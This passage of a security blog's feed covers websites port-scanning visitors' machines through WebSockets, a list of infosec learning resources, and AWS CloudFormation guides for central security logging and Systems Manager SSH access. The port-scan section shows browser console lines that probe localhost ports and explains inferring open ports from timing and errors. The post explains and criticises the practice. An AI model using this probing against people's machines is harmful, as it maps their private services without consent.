class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/05/ebay_port_scan.png" class="kg-image" alt="Why is This Website Port Scanning me?" loading="lazy"><figcaption>Ebay port scan</figcaption></figure><p>Looking at the list of ports they are scanning, they are looking for VNC services being run on the host, which is the same thing that was reported for bank sites. I marked out the ports and what they are known for (with a few blanks for ones I am unfamiliar with):</p><ul><li>5900: VNC </li><li>5901: VNC port 2 </li><li>5902: VNC port 3 </li><li>5903: VNC port 4 </li><li>5279: </li><li>3389: Windows remote desktop / RDP </li><li>5931: Ammy Admin remote desktop </li><li>5939: &#xA0;</li><li>5944: </li><li>5950: WinVNC &#xA0;</li><li>6039: X window system </li><li>6040: X window system </li><li>63333: TrippLite power alert UPS </li><li>7070: RealAudio</li></ul><p>VNC is sometimes run as part of bot nets or viruses as a way to remotely log into a users computer. There are several malware services that leverage VNC for these purposes. However it is also a valid tool used by administrators for remote access to machines, or by some end user support software, so the presence of VNC is a poor indicator of malware.</p><p>Furthermore, when I installed and ran a VNC server, I didn&apos;t detect any difference in site behavior - so why is it looking for it?</p><h2 id="how-port-scanning-with-websockets-works">How Port Scanning with WebSockets Works</h2><p>WebSockets are intended to allow a site to create bi-directional communication like traditional network sockets. This allows sites to periodically send information to a client browser without user interaction or front end polling, which is a win for usability.</p><p>When a web socket is configured, it specifies a destination host and port, which do not have to be the same domain that the script is served from. To do a port scan, the script only has to specify a private IP address (like localhost) and the port it wishes to scan. </p><p>WebSockets only speak HTTP though, so unless the host and port being scanned are a web socket server, the connection won&apos;t succeed. In order to get around this, we can use connection timing to determine whether the port is open or not. Ports that are open take longer in the browser, because there is a TLS negotiation step. </p><p>You also might get different error messages. If you have python installed, try running the following to create a local web server running on port 8080:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">python3 -m http.server 8080
</code></pre>
<!--kg-card-end: markdown--><p>Now, open your browser developer console (usually options -&gt; Web Developer -&gt; Console) and type some JavaScript in directly. Here is what I see when I do it in chrome:</p><!--kg-card-begin: markdown--><pre><code class="language-JavaScript">&gt; var s = new WebSocket(&quot;ws://127.0.0.1:8080&quot;)
&lt; undefined
VM1131:1 WebSocket connection to &apos;ws://127.0.0.1:8080/&apos; failed: Error during WebSocket handshake: Unexpected response code: 200
(anonymous) @ VM1131:1
&gt;var s = new WebSocket(&quot;ws://127.0.0.1:8081&quot;)
&lt;undefined
VM1168:1 WebSocket connection to &apos;ws://127.0.0.1:8081/&apos; failed: Error in connection establishment: net::ERR_CONNECTION_REFUSED
</code></pre>
<!--kg-card-end: markdown--><p>Between error message introspection and timing attacks, a site can have a pretty good idea of whether a given port is open.</p><h2 id="port-scanning-is-malicious">Port Scanning is Malicious</h2><p>Whether the port scan is used as part of an infection or part of e-commerce or bank &quot;security checks&quot;, it is clearly malicious behavior and may fall on the wrong side of the law.</p><p>If you observe this behavior, I encourage you to complain to the institution performing the scans, and install extensions that attempt to block this kind of phenomenon in your browser, generally by preventing these types of scripts from loading in the first place.</p><h1 id="prevent-this-kind-of-abuse">Prevent this kind of abuse</h1><p>When I initially wrote this article, I didn&apos;t have any good tools to recommend to block this kind of malicious action by a site. I was recently clued in to <a href="https://github.com/ACK-J/Port_Authority?ref=nullsweep.com">Port Authority</a>, a FireFox extension, that looks like a great way to block this and other nasty techniques that remove some agency from the user. Check it out!</p>]]></content:encoded></item><item><title><![CDATA[My Favorite InfoSec Learning Resources]]></title><description><![CDATA[A structured list of security learning resources.]]></description><link>https://nullsweep.com/my-favorite-infosec-learning-resources/</link><guid isPermaLink="false">5e9d7b7bc049fc234ea58cc2</guid><category><![CDATA[Career]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Fri, 24 Apr 2020 10:37:24 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1569585723140-efb9daaa18f3?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1569585723140-efb9daaa18f3?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="My Favorite InfoSec Learning Resources"><p>I am always learning new things about security, and sometimes mentor junior team members on where they can learn new skills. I find that a successful practitioner is one who not only spends time understanding the security concerns, tools, and skill sets, but also the underlying technologies to be protected as a normal user would. </p><p>This may mean spending time understanding the life of a sysadmin for OS protection, programming for securing development, cloud administration, etc.</p><p>I am not an expert in all these areas, but I love to broaden my view. Here, I wanted to share the learning resources I find myself returning to when I need a refresher on something, or assets I suggest a colleague leverage to skill up quickly.</p><h2 id="security-books">Security Books</h2><p><a href="https://www.amazon.com/gp/product/1593275641/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1593275641&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=0d6d01cac0037da53e02d9570224a213&amp;ref=nullsweep.com">Penetration Testing</a> by Georgia Weidman. This is great for everyone in the field, pen tester or not, because of how Georgia lays out the tools and processes a pen tester can use, along with common vulnerability findings.</p><p><a href="https://www.manning.com/books/securing-devops?ref=nullsweep.com">Securing Devops</a> by Julien Vehent. This book took me by surprise with how good it is. The best book I have read for understanding the many facets of real security programs in modern companies - devops, cloud security, log centralization, and more. It&apos;s also probably the quickest read on this list.</p><p><a href="https://www.amazon.com/gp/product/1593275099/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1593275099&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=cf249c1e28b4261923a1f1adeb55cc10&amp;ref=nullsweep.com">The Practice of Network Security Monitoring</a> by Richard Bejtlich. I love this book from a defensive perspective, as it teaches all about setting up network monitoring and detecting and reacting to intrustions. I am still working my way through it.</p><p><a href="https://www.amazon.com/gp/product/0321444426/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=0321444426&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=401705f28cbb188e4abf81a2fe309717&amp;ref=nullsweep.com">The Art of Software Security Assessment</a> by John McDonald, Mark Down, and Justin Schuh. This book is a beast to get through, but is the seminal text on assessing a piece of software from a security perspective. It is thorough and detailed, walking through proper processes, strategies for tackling an audit, and a huge variety of vulnerabilities and how they present.</p><p><a href="https://www.amazon.com/gp/product/1260108414/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1260108414&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=d59a4f6097375169cf907677c5e263f2&amp;ref=nullsweep.com">Gray Hat Hacking</a> by multiple authors. This is a great second security book, after Penetration Testing, for getting your hands dirtier. I find the examples tend to run a little light on the theory, requiring follow up research and reading, but that&apos;s not a bad thing. This book walks through a little of everything: fuzzing and finding 0day&apos;s, web app pen testing, running scannings, network attacks, OS attacks, and more.</p><p><a href="https://www.amazon.com/gp/product/169903530X/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=169903530X&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=638eb1dc71c2fc32995244611f368d4f&amp;ref=nullsweep.com">Open Source Intelligence Techniques</a> by <a href="https://inteltechniques.com/?ref=nullsweep.com">Michael Bazzell</a>. This walks through many ways to find information online. Some of it is basic (google hacking and leveraging search well), and some of it is advanced. The book is focused on individuals, but the concepts can be leveraged to anything. The flip side of this is an excellent guide to privacy. His website is a great resource for both as well.</p><p><a href="https://www.amazon.com/gp/product/1250010454/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1250010454&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=7f578af4b053a24a1b7753c26c7e21e0&amp;ref=nullsweep.com">How to be Invisible</a> by J.J. Luna. This may not be strictly a security professionals book, but it does outline a number of ways to protect your assets, privacy, and security both online and off, using a variety of legal tricks and security practices. </p><p><a href="https://www.amazon.com/gp/product/1118026470/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1118026470&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=af41627e39ab425546e05be8c13cda98&amp;ref=nullsweep.com">The Web Application Hackers Handbook</a> by Dafydd Stuttard. I was a little conflicted putting this here because the book has a lot of proprietary tool stuff, though I still think it is the best book to learn classes of web application vulnerabilities and how to find them. </p><h2 id="capture-the-flag-hands-on">Capture the Flag / Hands On</h2><p>After reading theory, and perhaps running specific examples or labs, I like to practice in slightly more open environments. Here are the ones I have enjoyed the best, keeping in mind that there are many more available than I will ever have time to try. If something sounds interesting - try it!</p><p><a href="https://overthewire.org/wargames/?ref=nullsweep.com">Over the wire</a> - Natas is great for web pen testing, and the rest for coming up to speed on things like buffer overflow and memory corruption. I haven&apos;t completed everything on the site, but I always learned a lot. All the challenges are free.</p><p><a href="ttps://www.pentesterlab.com/">Pentester lab</a> - an excellent site for learning, with a structured approach and courses. Unfortunately, it&apos;s a modest investment on an ongoing basis.</p><p><a href="https://www.vulnhub.com/?ref=nullsweep.com">Vulnhub</a> - Download lot&apos;s of (Free!) vulnerable VM&apos;s. If you are just starting out, try out the <a href="https://www.vulnhub.com/?q=kioptrix&amp;sort=date-des&amp;ref=nullsweep.com">Kioptrix</a> series (1-5), <a href="https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/?ref=nullsweep.com">Minotaur</a>, <a href="https://www.vulnhub.com/entry/pwnlab-init,158/?ref=nullsweep.com">pwnlab</a>, <a href="https://www.vulnhub.com/entry/stapler-1,150/?ref=nullsweep.com">stapler</a>, and <a href="https://www.vulnhub.com/entry/vulnos-2,147/?ref=nullsweep.com">VulnOS</a>.</p><p><a href="https://www.hackthebox.eu/?ref=nullsweep.com">Hack the Box</a> - One of my favorite sites. VPN into their network and have fun! There is a small hacking challenge to get an account. They have a Pro version, but the free one is plenty for part time learning.</p><p><a href="http://www.fuzzysecurity.com/tutorials.html?ref=nullsweep.com">Fuzzy Security Tutorials</a> - More a mix of tutorial, VM exploit walkthroughs, and overviews of concepts - this site has many interesting resources for learning aspects of hacking.</p><p>Here are a few good cheat sheets: enumerate <a href="http://www.0daysecurity.com/penetration-testing/enumeration.html?ref=nullsweep.com">network services</a>, <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?ref=nullsweep.com">reverse shells</a>, and one for <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/?ref=nullsweep.com">privilege escalation</a> (it&apos;s a little old, but still relevant - the methodology is what counts.).</p><h2 id="programming">Programming</h2><p>I&apos;m a programmer by trade and only entered the security field later, so I am less versed in early learning. I first learned programming by picking up an introductory C++ text and working my way through it cover to cover, before entering college. I picked up some bad practices, and missed some important concepts doing it this way, so I usually recommend structured courses to start. </p><p>I recommend starting with Python if you are new to programming. It is easy to read compared to some languages, has relatively simple tooling, and is frequently used by the security community.</p><p><a href="https://www.udacity.com/school-of-programming?ref=nullsweep.com">Udacity programming track</a> - Start with <a href="https://www.udacity.com/course/introduction-to-python--ud1110?ref=nullsweep.com">Introduction to Programming</a>, and go on to <a href="https://www.udacity.com/course/design-of-computer-programs--cs212?ref=nullsweep.com">Design of Computer Programs</a>. The second one in particular is one of the best programming courses I have ever taken, including many university courses. Both of these should be free, but Udacity has many paid courses and I have always found the content good.</p><p><a href="https://podcasts.apple.com/us/podcast/developing-ios-11-apps-with-swift/id1315130780?ref=nullsweep.com">Developing iOS 11 apps with Swift</a> by Paul Hegarty if you want to learn iOS development or mobile more broadly. This is probably less helpful to security practitioners unless you are specifically working with mobile app development teams. This would be a very challenging first programming course, as he assumes the student is already familiar with most programming concepts (data structures &amp; OOP specifically). </p><p><a href="https://www.amazon.com/gp/product/0134190440/ref=as_li_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=0134190440&amp;linkCode=as2&amp;tag=nullsweep-20&amp;linkId=4df36b306d07dd4c6ad2c23ec3fe6193&amp;ref=nullsweep.com">The Go Programming Language</a> by Alan A. A. Donovan and Brian W. Kernighan. I prefer Go for command line tooling over python for a number of reasons. Mostly, I find that a compiled language removes all the local dependencies that Python comes with, and the golang compiler makes it easy to build for different systems.</p><h2 id="certifications-courses">Certifications &amp; Courses</h2><p>I really like structured learning. Unfortunately, I have not found many courses that I really like. I have taken some great SANS courses, but can&apos;t recommend them due to their high cost, unless your company is paying. </p><p>The same is true for certifications. The two I think are most valuable over all are the CISSP (requires 5+ years experience) and the OSCP. Others may be a good investment depending on target jobs and employers, especially Security+.</p><p>With all of that, there are really only two things I can recommend, with the caveat that I personally have not completed either.</p><p><a href="https://www.offensive-security.com/pwk-oscp/?ref=nullsweep.com">Pen testing with Kali </a>by Offesive Security. This is the official OSCP preparation course, and is highly touted in the community. It starts at $1000, which is not very expensive considering other top tier classes.</p><p><a href="https://www.offensive-security.com/pwk-oscp/?ref=nullsweep.com">Pentester lab</a> as I mentioned above. Their pro service has some excellent courses and hands on. A lot less investment to get started at $20/month.</p><h2 id="ongoing-reading-and-news">Ongoing Reading and News</h2><p>Often, I find I learn the most when I stumble across a newly discovered exploit or vulnerability, then take the time to research how it works. Most of the CTF challenges and formal training options will cover only a subset of real world attacks. Reading the news will broaden your understanding of attacks that need to be considered in production environments.</p><p>Additionally, attacks like encryption downgrade attacks, cache poisoning, or phishing are rarely well represented in training labs. Reading about real world attacks and defenses help greatly in this regard. Here is a list of news and infosec sites worth following - there are too many to watch regularly, so pick the ones you like or use an RSS reader.</p><p><a href="https://www.bleepingcomputer.com/?ref=nullsweep.com">Bleeping Computer</a> - News about current attacks and breaches. Most articles aren&apos;t technically deep.</p><p><a href="https://www.reddit.com/r/netsec?ref=nullsweep.com">r/netsec</a> - a reddit community discussing vulnerabilities, exploits, and tools. Great for learning.</p><p><a href="https://nakedsecurity.sophos.com/?ref=nullsweep.com">Naked Security by Sophos</a> - Another news site about current attack trends. </p><p><a href="https://krebsonsecurity.com/?ref=nullsweep.com">Krebs</a> - Great in depth write ups on security news, sometimes breaking news, and general security information</p><p><a href="https://threatpost.com/?ref=nullsweep.com">ThreatPost</a> - yet another news site</p><p><a href="https://www.darkreading.com/?ref=nullsweep.com">Dark Reading</a> - another popular security news site</p><h2 id="conclusions">Conclusions</h2><p>There are tons of other learning resources out there. I didn&apos;t touch on many areas of importance such as networking, sysadmin, architecture, and cloud. Each of these is a domain of their own, and I learned them largely by doing and reading to solve problems in my day job.</p><p>My philosophy has been to learn continuously, and be curious. I investigate things I don&apos;t understand well, and prefer fundamental understanding over edge understanding. When given a choice on where to focus my time, I generally choose to focus on the broader concepts, which apply to more things, than specific exploits or vulnerabilites.</p><p>A good way to think about it is, if I come across an exploit that takes advantage of something I don&apos;t fully understand, I will take the time to understand the underlying system and how it works, rather than focusing on the exploit. Later, I can come back to the exploit with a much deeper understanding of how it was found and exploited, as well as all exploits of a similar class.</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Centralized Security Logging in AWS]]></title><description><![CDATA[CloudFormation templates and walk-through to setup detailed security logging in multiple AWS accounts, centralized into a security account.]]></description><link>https://nullsweep.com/centralized-security-logging-in-aws/</link><guid isPermaLink="false">5e6a0692c049fc234ea58bc5</guid><category><![CDATA[AWS]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Technical Guides]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Wed, 18 Mar 2020 10:38:00 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/03/security_log_centralization_architecture_aws-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/03/security_log_centralization_architecture_aws-1.png" alt="Centralized Security Logging in AWS"><p>When securing an AWS environment, one of the first tasks is <a href="https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-receive-logs-from-multiple-accounts.html?ref=nullsweep.com">configuring CloudTrail</a> and ensuring that logs from various accounts within an organization are shipped to a centralized AWS security account.</p><p>Frequently, however, there are other log sources that I will want to monitor across the environment. These are logs generated by custom services and applications that have some impact on security - web server logs, syslogs, various security product logs, etc.</p><p>When I first attempted to do this, it wasn&apos;t obvious from the documentation how to properly configure a system that could ingest from multiple accounts and data sources, and consolidate everything in one place.</p><p>In this article, I&apos;ll walk through the setup I finally landed on to capture those logs in CloudWatch, ingest them into a security account with Kinesis, and store them in an S3 bucket for future use. Some of the architecture choices are forced by AWS policy for cross account access (Kinesis).</p><p>A full setup would likely also include a life-cycle policy (storing older logs in something like Glacier), and integration with an SIEM or log visualization tool. I have used the Splunk S3 integration for SIEM integrations from this setup, and Kibana with ElasticSearch as a separate output from Kinesis for these purposes in the past.</p><p>If you haven&apos;t seen the security VPC setup, I cover that in the first article in this series, <a href="https://nullsweep.com/advanced-aws-security-architecture/">advanced AWS security architecture</a>.</p><p>Why would we want to set something like this up? It gives us a few key security benefits:</p><ul><li>Immutable logs from all assets in our infrastructure. Auditors, security analysts, and forensic investigators can have confidence that a compromised server does not mean compromised logs, even if an attacker takes over the root account of a VPC.</li><li>One place to search all log data in the event of an incident. </li><li>Single point to backup / archive for future potential needs, allowing storage cost optimizations.</li><li>One integration point for downstream security systems such as SIEM or visualization tools.</li></ul><h2 id="log-architecture">Log Architecture</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/03/security_log_centralization_architecture_aws.png" class="kg-image" alt="Centralized Security Logging in AWS" loading="lazy"><figcaption>Security Log Centralization Architecture for AWS</figcaption></figure><p>The setup in AWS is a little complicated, since our goal is to enable centralization from many application accounts to a single security account. </p><p>On the security side, we have a customer managed key (KMS) for encrypting everything end to end, with an S3 bucket as long term storage. To ingest and direct these logs, we need a Kinesis stream (to receive) and Kinesis Firehose (to direct to S3), along with some IAM roles and glue components.</p><p>On the application side, we need a smaller footprint: a subscription and a CloudWatch group to subscribe to. Any number of groups and/or subscriptions can be created here. the subscriptions also give us the capability of filtering logs to taget only those we care about, such as webserver logs or specially crafted security logs from applications.</p><h1 id="cloudformation">CloudFormation</h1><p>I created two cloud formation templates to provision all of this infrastructure. I&apos;ll walk through each major component here, or you can skip this part and go right to the <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure/tree/master/log_centralization?ref=nullsweep.com">full templates in github</a>.</p><h3 id="required-role-policy">Required role &amp; policy</h3><p>We&apos;ll need a service role in the security account, and a policy that gives the minimum access needed to each service to ensure they can all communicate.</p><p>This role uses namespacing to give access only to the resources required. In this case, prefixing the assets with the name &quot;secops-&quot;. In a real environment, you might use a unique ID from an asset system tied to an application.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  IngestionRole:
    Type: AWS::IAM::Role
    Properties:
      RoleName: security-log-writer
      Path: /
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Action: sts:AssumeRole
            Effect: Allow
            Principal:
              Service: !Sub &quot;logs.${AWS::Region}.amazonaws.com&quot;
          - Action: sts:AssumeRole
            Effect: Allow
            Principal:
              Service: firehose.amazonaws.com
            Condition:
              StringEquals:
                sts:ExternalId: !Sub &quot;${AWS::AccountId}&quot;

  IngestionRolePolicy:
    Type: AWS::IAM::Policy
    Properties:
      PolicyName: security-log-writer-policy
      Roles:
        - !Ref IngestionRole
      PolicyDocument:
        Statement:
          - Sid: KinesisReadWrite
            Action:
              - kinesis:Describe*
              - kinesis:Get*
              - kinesis:List*
              - kinesis:Subscribe*
              - kinesis:PutRecord
            Effect: Allow
            Resource: !Sub &quot;arn:aws:kinesis:${AWS::Region}:${AWS::AccountId}:stream/secops-*&quot; # Namespacing this role for things named secops
          - Sid: S3ReadWrite
            Action:
              - s3:Get*
              - s3:Put*
              - s3:List*
            Effect: Allow
            Resource: # Namespace to assets starting with &quot;secops&quot;
              - &quot;arn:aws:s3:::secops-*&quot;
              - &quot;arn:aws:s3:::secops-*/*&quot;
          - Sid: Passrole
            Action:
              - iam:PassRole
            Effect: Allow
            Resource: !GetAtt IngestionRole.Arn
</code></pre>
<!--kg-card-end: markdown--><h3 id="kms-encryption-key">KMS Encryption Key</h3><p>We create a key that our role has complete access to. I also add the root user, and would recommend adding a security role for analysts in a real environment, or moving the logs into an analysis engine for consumption.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  KMSKey:
    Type: AWS::KMS::Key
    Properties:
      Description: Symmetric CMK
      KeyPolicy:
        Version: &apos;2012-10-17&apos;
        Id: key-default-1
        Statement:
        - Sid: KeyOwner
          Effect: Allow
          Principal:
            AWS: !Sub &quot;arn:aws:iam::${AWS::AccountId}:root&quot;
          Action: kms:*
          Resource: &apos;*&apos;
        - Sid: KeyUser
          Effect: Allow
          Principal:
            AWS: !GetAtt IngestionRole.Arn
          Action: kms:*
</code></pre>
<!--kg-card-end: markdown--><h3 id="s3-bucket-policy">S3 bucket &amp; policy</h3><p>An encrypted, non-public bucket and a locked down policy is all we need for this architecture. In a real enviornment, we would also want a data lifecycle policy to offload data to Glacier over time.</p><p>Here, I specify default AWS encryption, though a KMS key is preferred. Because logs are coming encrypted out of Kinesis already, they will actually land in the bucket encrypted with the KMS key anyway.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  LogBucket:
    Type: AWS::S3::Bucket
    Properties: 
      BucketName: !Ref LogBucketName
      # Prevent public access
      PublicAccessBlockConfiguration:
        BlockPublicPolicy: True
        BlockPublicAcls: True
        IgnorePublicAcls: True
        RestrictPublicBuckets: True
      # Encrypt the bucket - may also want to use KMS instead
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: AES256

  LogBucketPolicy:
    Type: AWS::S3::BucketPolicy 
    DependsOn: LogBucket
    Properties:
      Bucket: !Ref LogBucket
      PolicyDocument:
        Version: 2012-10-17
        Statement:
          - Action:
            - S3:GetObject
            - S3:PutObject
            Effect: Allow
            Resource: !Sub &quot;arn:aws:s3:::${LogBucketName}/*&quot;
            Principal:
              AWS: !GetAtt IngestionRole.Arn
            Condition:
              Bool:
                aws:SecureTransport: True
</code></pre>
<!--kg-card-end: markdown--><h3 id="kinesis-firehose">Kinesis &amp; Firehose</h3><p>Finally, we setup an encrypted Kinesis instance and Firehose. This is a minimal configuration of Kinesis, suitable for a smaller ingestion load. As the system scales up, this setup will require tweaking for higher availability and throughput.</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  Stream:
    Type: AWS::Kinesis::Stream
    Properties: 
      Name: secops-SecurityLogStream
      ShardCount: 1
      StreamEncryption: 
        EncryptionType: KMS
        KeyId: !Ref KMSKey

  Firehose:
    Type: AWS::KinesisFirehose::DeliveryStream
    Properties: 
      DeliveryStreamName: secops-SecurityLogFirehose
      DeliveryStreamType: KinesisStreamAsSource
      KinesisStreamSourceConfiguration: 
        KinesisStreamARN: !GetAtt Stream.Arn
        RoleARN: !GetAtt IngestionRole.Arn
      S3DestinationConfiguration: 
        BucketARN: !GetAtt LogBucket.Arn
        BufferingHints: 
          IntervalInSeconds: 300
          SizeInMBs: 5
        CompressionFormat: GZIP
        EncryptionConfiguration: 
          KMSEncryptionConfig: 
            AWSKMSKeyARN: !GetAtt KMSKey.Arn
        RoleARN: !GetAtt IngestionRole.Arn
</code></pre>
<!--kg-card-end: markdown--><h3 id="aws-log-destination">AWS Log Destination</h3><p>Finally, we need to configure the destination that will be pointed at from the application accounts, and direct incoming logs to the stream. As of this writing, Destinations don&apos;t allow the normal policy attachment, making it difficult to include paramaters and references.</p><p>The solution I use is to create the policy inline with Join functions, which will allow us to reference parameters. Because we are doing cross account access, we have to specify which AWS accounts are allowed to write to our security account. Every time we add a new account, we will have to update this policy.</p><p>The format of the AppAccountIDs parameter is a comma separated string of account ID&apos;s</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  LogDestination:
    Type: AWS::Logs::Destination
    DependsOn: Stream
    Properties: 
      DestinationName: SecurityLogDestination
      DestinationPolicy: 
        !Join
          - &apos;&apos;
          - - &apos;{&apos;
            - &apos;    &quot;Version&quot; : &quot;2012-10-17&quot;,&apos;
            - &apos;    &quot;Statement&quot; : [&apos;
            - &apos;      {&apos;
            - &apos;        &quot;Sid&quot; : &quot;&quot;,&apos;
            - &apos;        &quot;Effect&quot; : &quot;Allow&quot;,&apos;
            - &apos;        &quot;Principal&quot; : {&apos;
            - &apos;          &quot;AWS&quot; : [&apos;
            - !Ref AppAccountIDs
            - &apos;           ]&apos;
            - &apos;        },&apos;
            - &apos;        &quot;Action&quot; : &quot;logs:PutSubscriptionFilter&quot;,&apos;
            - !Sub &apos;        &quot;Resource&quot; : &quot;arn:aws:logs:${AWS::Region}:${AWS::AccountId}:destination:SecurityLogDestination&quot;&apos;
            - &apos;      }&apos;
            - &apos;    ]&apos;
            - &apos;  }&apos;
      RoleArn: !GetAtt IngestionRole.Arn
      TargetArn: !GetAtt Stream.Arn
</code></pre>
<!--kg-card-end: markdown--><h1 id="generating-test-logs">Generating Test Logs</h1><p>I didn&apos;t cover the creation of a log group or subscription above, but you can see the templates in <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure/tree/master/log_centralization?ref=nullsweep.com">github</a> (they are pretty simple). To run a test, I want to configure cloudwatch on an EC2 instance to send the messages logfile to the created group, then see if it makes its way to S3.</p><p>A good walkthrough of this setup process can be found on <a href="https://blogs.tensult.com/2018/04/13/sending-linux-logs-to-aws-cloudwatch/?ref=nullsweep.com">tensult&apos;s blog</a>. The key item is to ensure that the <code>awslogs</code> process settings file has the proper group installed:</p><!--kg-card-begin: markdown--><pre><code class="language-bash">[/var/log/messages]
datetime_format = %b %d %H:%M:%S
file = /var/log/messages
buffer_duration = 5000
log_stream_name = {instance_id}
initial_position = start_of_file
log_group_name = logs-for-security-ingestion
</code></pre>
<!--kg-card-end: markdown--><p>You should immediately see logs flowing into CloudWatch, and within five or ten minutes, showing up in S3 as gzipped files.</p><h2 id="conclusions">Conclusions</h2><p>Centralizing logs across many application accounts is more confusing than it probably should be. Moving the logs from S3 into another system frequently requires additional infrastructure and configurations. However, the security benefits of this are numerous, and it&apos;s probably worth doing as you scale up a larger business on AWS.</p><p>Unfortunately, all this infrastructure doesn&apos;t come free. Each component carries a cost (though I have not found it to be notable compared to what is monitored, with tight filters to scope down total logs ingested), and operational overhead. </p><p>I have not covered it here, but additional monitoring may be required to ensure that the log flow through these components is uninterrupted, and source logs are not being missed through missing subscriptions or improper CloudWatch agent setups.</p>]]></content:encoded></item><item><title><![CDATA[A Better Way to SSH in AWS (With RDS tunneling and security automation)]]></title><description><![CDATA[Setup and use System and Session Manager to replace bastion hosts for SSH and RDS tunnels. Automate security tasks on servers with automation documents.]]></description><link>https://nullsweep.com/a-better-way-to-ssh-in-aws/</link><guid isPermaLink="false">5e4a7a8bab3deb04f38745b5</guid><category><![CDATA[AWS]]></category><category><![CDATA[DevSecOps]]></category><category><![CDATA[Technical Guides]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 25 Feb 2020 02:11:49 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/02/ssh_and_rds_tunnel-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/02/ssh_and_rds_tunnel-1.jpg" alt="A Better Way to SSH in AWS (With RDS tunneling and security automation)"><p>When I first started using AWS environments, the Bastion architecture was prevalent as the way to setup SSH connections. A dedicated &quot;bastion&quot; server is provisioned with SSH ports exposed to an internal network, or in some cases the internet, so that other servers do not have to expose their own SSH ports. Sometimes, the bastion host is used to tunnel to databases or other more sensitive ports as well, though I generally prefer to chain SSH -&gt; bastion -&gt; application server -&gt; DB/etc.</p><p>While this method is good because it reduces the attack surface area and gives a single point of control, it also increases overall cost of maintenance and results in a pretty risky server.</p><p>In 2019, AWS announced tunneling support for SSH and SCP with Systems Manager, meaning that Bastion hosts can be replaced for most use cases. We can also pick up a couple of extra security goodies when moving to systems manager:</p><ul><li>Automated server patching</li><li>Enforced security standards on OS level hardening or agent installs</li><li>Full SSH session logging is simple to enable (I actually recommend disabling this unless you really need it to avoid storing sensitive information in these logs)</li></ul><p>In this article, we&apos;ll be walking through an initial SSM setup, testing SSH to an EC2 instance along with a tunnel to RDS, and then configuring automated patching and security checks for that instance.</p><p>The templates shown in this article don&apos;t depend on other templates in my <a href="https://nullsweep.com/advanced-aws-security-architecture/">Advanced AWS security architecture</a> series, but you might be interested in reading the first article before taking on this one.</p><p>The full CloudFormation template for deploying a SystemsManager enabled instance with a sample automation document can be found on my <a href="https://github.com/Charlie-belmer/advanced_aws_security_infrastructure?ref=nullsweep.com">GitHub</a>.</p><h2 id="initial-ssm-setup">Initial SSM setup</h2><p>In order to leverage SSM, we need a few things:</p><ul><li>An Instance profile we can attach to EC2 instances</li><li>A Role that can assume permissions for SSM tasks</li><li>An SSM agent installed and running on the EC2 instance.</li></ul><p>Here is a CloudFormation snippet to create an instance profile and a role that allows the EC2 instance to leverage SSM:</p><!--kg-card-begin: markdown--><pre><code class="language-yaml">  SSMProfile:
    DependsOn: SSMRole
    Type: AWS::IAM::InstanceProfile
    Properties: 
      InstanceProfileName: SSMInstanceProfile
      Roles: 
        - !Ref SSMRole

  SSMRole:
    Type: AWS::IAM::Role
    Properties: 
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service:
                - ec2.amazonaws.com
            Action:
              - &apos;sts:AssumeRole&apos;
      Description: Basic SSM permissions for EC2
      ManagedPolicyArns: 
        - arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore 
      RoleName: SSMInstanceProfile
</code></pre>
